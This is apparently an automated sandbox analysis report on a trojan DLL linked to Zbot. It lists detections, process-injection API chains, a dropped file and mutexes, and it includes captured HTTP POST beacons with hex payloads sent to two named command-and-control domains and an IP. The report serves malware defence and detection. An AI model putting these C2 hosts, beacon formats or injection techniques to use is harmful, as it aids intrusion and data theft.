Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report cXQT5g

Overview

General Information

Sample Name:cXQT5g (renamed file extension from none to dll)
Analysis ID:303342
MD5:5fccb5a81839cc682a559febbea7dd99
SHA1:6e50ebce2b1791527aa79005dc0fb35cc65a1249
SHA256:e37e83f6d5e73a831beed5fe4375bd70caecdad3ef39c579e398f66a75ea4d5a

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Binary contains a suspicious time stamp
Contains functionality to inject code into remote processes
Found C&C like URL pattern
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the product ID of Windows
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6520 cmdline: loaddll32.exe 'C:\Users\user\Desktop\cXQT5g.dll' MD5: 6A3082E6152C823BF9EB895EA06EA605)
    • msiexec.exe (PID: 4448 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://wingtonwelbemdon.com/web/post.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://wingtonwelbemdon.com/web/post.phpVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: cXQT5g.dllVirustotal: Detection: 10%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Omne\fapud.dllJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: cXQT5g.dllJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0014DF70 FindFirstFileW,FindNextFileW,18_2_0014DF70
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov eax, esi1_2_6E499AE0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movzx eax, byte ptr [ecx+ebx]1_2_6E4A7F10
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movzx eax, byte ptr [esi+edi]1_2_6E4A5F30
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movsx edi, byte ptr [ebx+eax]1_2_6E4A8FA0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then test di, di1_2_6E4A6C60
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov ecx, dword ptr [6E4B2090h+eax*4]1_2_6E4A4C00
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov dword ptr [ebp-10h], esi1_2_6E4A70F0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then lea esi, dword ptr [ebp-34h]1_2_6E4A1D00
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movzx edx, word ptr [ecx]1_2_6E4A9530
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]1_2_6E4AB1B0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, esi18_2_00149AE0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov ecx, dword ptr [00162090h+eax*4]18_2_00154C00
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then test di, di18_2_00156C60
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-10h], esi18_2_001570F0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esi, dword ptr [ebp-34h]18_2_00151D00
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edx, word ptr [ecx]18_2_00159530
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]18_2_0015B1B0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [ecx+ebx]18_2_00157F10
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [esi+edi]18_2_00155F30
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movsx edi, byte ptr [ebx+eax]18_2_00158FA0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2019141 ET TROJAN Zbot POST Request to C2 192.168.2.3:49739 -> 91.203.192.40:80
Source: TrafficSnort IDS: 2019141 ET TROJAN Zbot POST Request to C2 192.168.2.3:49740 -> 91.203.192.40:80
Found C&C like URL patternShow sources
Source: global trafficHTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r
Source: global trafficHTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: donburitimesofindia.comContent-Length: 285Connection: CloseCache-Control: no-cacheData Raw: fa 09 a1 8f bf 84 28 1c b7 ee e8 94 0d 9a 89 22 72 8f 0b 43 df 1c dc b5 f5 3d 88 d0 13 98 c2 2e 8d 56 4c 02 ba dc 12 2e 22 c0 83 f6 a6 75 7a 4c a7 20 5b 33 03 33 b9 fb 0d 80 79 ff 30 07 4f e2 37 db 9d d5 22 45 b3 36 a5 46 fc 60 62 46 67 75 c4 98 76 9e 15 dd 72 7b d1 b5 99 b5 b3 89 a5 4a 01 fb 23 ed aa e8 73 f7 6e a3 e3 e7 ff 3a c3 e4 7c 3e 29 f7 d5 f0 47 17 a6 9d a0 04 95 d1 ca 0b 02 d7 50 16 43 0c b9 b4 ec 73 85 80 09 e4 c6 7c 17 f4 e9 f1 ea 37 12 f6 ae e0 0f 14 a9 e8 b0 2b 14 0e df 1f 63 6a 69 30 67 5b 70 29 e8 e4 85 b1 13 13 ef c6 a2 d6 59 08 4d fa 2a 61 cc ad 2b 85 8b 25 81 94 fb 01 11 98 22 ed d2 17 52 d7 16 39 f5 3f db bb 9a 48 8a 89 e0 50 a6 73 88 32 6a f5 af a5 35 93 52 2b 2f ae aa 7f 08 d8 1a f4 72 1f 9f f1 17 e4 df eb 6e dd 0b f0 bc 49 36 90 80 87 99 6b 34 0e 56 77 94 1e c2 ea 6c 24 4e 58 91 d2 46 d3 ee 1f b2 b3 b3 68 a3 14 14 b9 f7 Data Ascii: ("rC=.VL."uzL [33y0O7"E6F`bFguvr{J#sn:|>)GPCs|7+cji0g[p)YM*a+%"R9?HPs2j5R+/rnI6k4Vwl$NXFh
Source: Joe Sandbox ViewASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
Source: global trafficHTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r
Source: global trafficHTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: donburitimesofindia.comContent-Length: 285Connection: CloseCache-Control: no-cacheData Raw: fa 09 a1 8f bf 84 28 1c b7 ee e8 94 0d 9a 89 22 72 8f 0b 43 df 1c dc b5 f5 3d 88 d0 13 98 c2 2e 8d 56 4c 02 ba dc 12 2e 22 c0 83 f6 a6 75 7a 4c a7 20 5b 33 03 33 b9 fb 0d 80 79 ff 30 07 4f e2 37 db 9d d5 22 45 b3 36 a5 46 fc 60 62 46 67 75 c4 98 76 9e 15 dd 72 7b d1 b5 99 b5 b3 89 a5 4a 01 fb 23 ed aa e8 73 f7 6e a3 e3 e7 ff 3a c3 e4 7c 3e 29 f7 d5 f0 47 17 a6 9d a0 04 95 d1 ca 0b 02 d7 50 16 43 0c b9 b4 ec 73 85 80 09 e4 c6 7c 17 f4 e9 f1 ea 37 12 f6 ae e0 0f 14 a9 e8 b0 2b 14 0e df 1f 63 6a 69 30 67 5b 70 29 e8 e4 85 b1 13 13 ef c6 a2 d6 59 08 4d fa 2a 61 cc ad 2b 85 8b 25 81 94 fb 01 11 98 22 ed d2 17 52 d7 16 39 f5 3f db bb 9a 48 8a 89 e0 50 a6 73 88 32 6a f5 af a5 35 93 52 2b 2f ae aa 7f 08 d8 1a f4 72 1f 9f f1 17 e4 df eb 6e dd 0b f0 bc 49 36 90 80 87 99 6b 34 0e 56 77 94 1e c2 ea 6c 24 4e 58 91 d2 46 d3 ee 1f b2 b3 b3 68 a3 14 14 b9 f7 Data Ascii: ("rC=.VL."uzL [33y0O7"E6F`bFguvr{J#sn:|>)GPCs|7+cji0g[p)YM*a+%"R9?HPs2j5R+/rnI6k4Vwl$NXFh
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00152C60 InternetReadFile,18_2_00152C60
Source: unknownDNS traffic detected: queries for: wingtonwelbemdon.com
Source: unknownHTTP traffic detected: POST /web/post.php HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: wingtonwelbemdon.comContent-Length: 429Connection: CloseCache-Control: no-cacheData Raw: 5b 12 67 2b ea 7c b2 13 b1 b0 c8 3f 99 f6 12 73 79 be 36 cb 57 94 54 3d 7d b5 00 58 9b 10 4a a6 25 7e 57 68 01 d2 8f 7e a9 0c ea 36 68 e3 9f 84 6f e8 93 fb cb fb 71 33 c5 48 b1 37 f8 cf 87 2a ff 13 55 1d ea 8d 7b fe 6d 8e 34 a8 aa 8e af bd 0c 50 be 56 dd 15 ba b3 19 7d 51 7d 7b 41 6d 82 c9 33 eb 25 62 20 bb 3f a6 6b 2b 2f 37 f2 0b 2c b4 f6 e1 3f 1d 38 8f df 6e 55 68 cc 5d 19 02 c3 ca 1f 98 de 8b c4 71 7c 24 bb 4d 48 c1 2c 0e b4 df 3c 21 39 22 ff da 3e 66 28 c7 dc 61 20 78 e3 dc c6 51 be 3a ab d7 39 97 d8 3f e7 85 7c b2 d1 a2 f9 05 2c 48 3c b3 e2 a7 10 c0 8b 26 47 c1 6f 61 cf 6b 70 30 94 56 7d 87 dc e0 18 df c2 61 09 17 33 ca 70 40 33 68 a4 a9 67 a6 f8 78 1b 51 9f df 8e 5f b4 07 e4 18 e4 47 26 ab 42 b1 14 95 bd ca 07 8e d6 c8 cc b0 1e 27 2b a6 d0 c9 73 7f 3a 94 60 22 43 ce 12 0e 96 64 d2 ed 55 63 6a 18 5e 16 9b 74 21 ef c8 2d 8d 62 69 d5 97 f3 f6 e2 19 ad 66 0f df 42 56 27 29 57 70 17 42 e2 31 3d d4 5d 4c 61 2d b4 a6 51 0e 35 a5 a6 97 ab c5 9a ea 45 b2 43 64 76 9e 2a 66 7e e5 17 a4 3a 11 9d d2 d2 02 5c 6a 6a 09 5c 56 22 f6 d9 29 a6 d6 b9 df 33 54 be 99 d0 91 cb 38 07 82 88 35 d9 2f 5f 79 dc 48 b3 9e 47 45 0a c4 a1 eb 8f 7d 13 6f de dd 37 c5 c7 fc 10 49 2b 4d c1 7f 21 6d 0d a3 f7 12 c3 de 61 38 32 35 b5 9a 85 d5 74 0d 09 a9 ba 6e a5 23 29 11 24 3b 96 60 f5 72 01 e9 be Data Ascii: [g+|?sy6WT=}XJ%~Wh~6hoq3H7*U{m4PV}Q}{Am3%b ?k+/7,?8nUh]q|$MH,<!9">f(a xQ:9?|,H<&Goakp0V}a3p@3hgxQ_G&B'+s:`"CdUcj^t!-bifBV')WpB1=]La-Q5ECdv*f~:\jj\V")3T85/_yHGE}o7I+M!ma825tn#)$;`r
Source: C:\Windows\System32\loaddll32.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4AC9D01_2_6E4AC9D0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0015F41018_2_0015F410
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0015F4BC18_2_0015F4BC
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0015C9D018_2_0015C9D0
Source: cXQT5g.dllBinary or memory string: OriginalFilenameCaptain.dllD vs cXQT5g.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: cXQT5g.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fapud.dll.18.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal92.troj.evad.winDLL@3/2@3/1
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E49FDC0 LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_6E49FDC0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00143B10 AdjustTokenPrivileges,FindCloseChangeNotification,18_2_00143B10
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E498EB0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,1_2_6E498EB0
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OmneJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\{9AD2E113-FD6E-1193-7CD4-CAAB82FC3C29}
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\{BAAAD113-CD6E-31EB-7CD4-CAAB82FC3C29}
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\{0A43D38F-CFF2-8102-7CD4-CAAB82FC3C29}
Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\Local\Temp\tmp.txtJump to behavior
Source: cXQT5g.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: cXQT5g.dllVirustotal: Detection: 10%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\cXQT5g.dll'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
Source: cXQT5g.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cXQT5g.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cXQT5g.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cXQT5g.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cXQT5g.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cXQT5g.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cXQT5g.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: cXQT5g.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\62\10\Six\Need\shoe\85\48\Name\23\43\Felt\Our\Captain.pdb source: loaddll32.exe, 00000001.00000002.459411505.000000006E51D000.00000002.00020000.sdmp, msiexec.exe, 00000012.00000003.464541289.0000000004400000.00000004.00000001.sdmp, cXQT5g.dll
Source: cXQT5g.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cXQT5g.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cXQT5g.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cXQT5g.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cXQT5g.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0x6173D010 [Sat Oct 23 09:04:16 2021 UTC]
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4A70F0 LoadLibraryA,GetProcAddress,1_2_6E4A70F0
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B5E7D push ebx; iretd 1_2_6E4B5E83
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B727C push ebx; retf 1_2_6E4B72EB
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B7038 push dword ptr [ebp-773E11F7h]; ret 1_2_6E4B705D
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B6EE2 pushfd ; retf 1_2_6E4B6F4F
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B72A3 push ebx; retf 1_2_6E4B72EB
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B7B4B push eax; iretd 1_2_6E4B7B7F
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B6F44 pushfd ; retf 1_2_6E4B6F4F
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B7B67 push eax; iretd 1_2_6E4B7B7F
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4BA170 push esp; retf 1_2_6E4BA186
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4B75A4 push edi; iretd 1_2_6E4B75A5
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5359D5 push esi; ret 1_2_6E5359DE
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Omne\fapud.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Omne\fapud.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_18-14445
Source: C:\Windows\System32\loaddll32.exe TID: 6524Thread sleep count: 294 > 30Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0014DF70 FindFirstFileW,FindNextFileW,18_2_0014DF70
Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4A70F0 LoadLibraryA,GetProcAddress,1_2_6E4A70F0
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E49F390 mov eax, dword ptr fs:[00000030h]1_2_6E49F390
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E533EB5 mov eax, dword ptr fs:[00000030h]1_2_6E533EB5
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E5339F3 push dword ptr fs:[00000030h]1_2_6E5339F3
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E533DEB mov eax, dword ptr fs:[00000030h]1_2_6E533DEB
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0014F390 mov eax, dword ptr fs:[00000030h]18_2_0014F390
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E4AC590 GetProcessHeap,HeapAlloc,GetTempPathW,GetFileAttributesW,DeleteFileW,HeapFree,1_2_6E4AC590
Source: C:\Windows\System32\loaddll32.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to inject code into remote processesShow sources
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E49B100 VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,1_2_6E49B100
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmpBinary or memory string: Progman
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API2DLL Side-Loading1Access Token Manipulation1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Access Token Manipulation1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.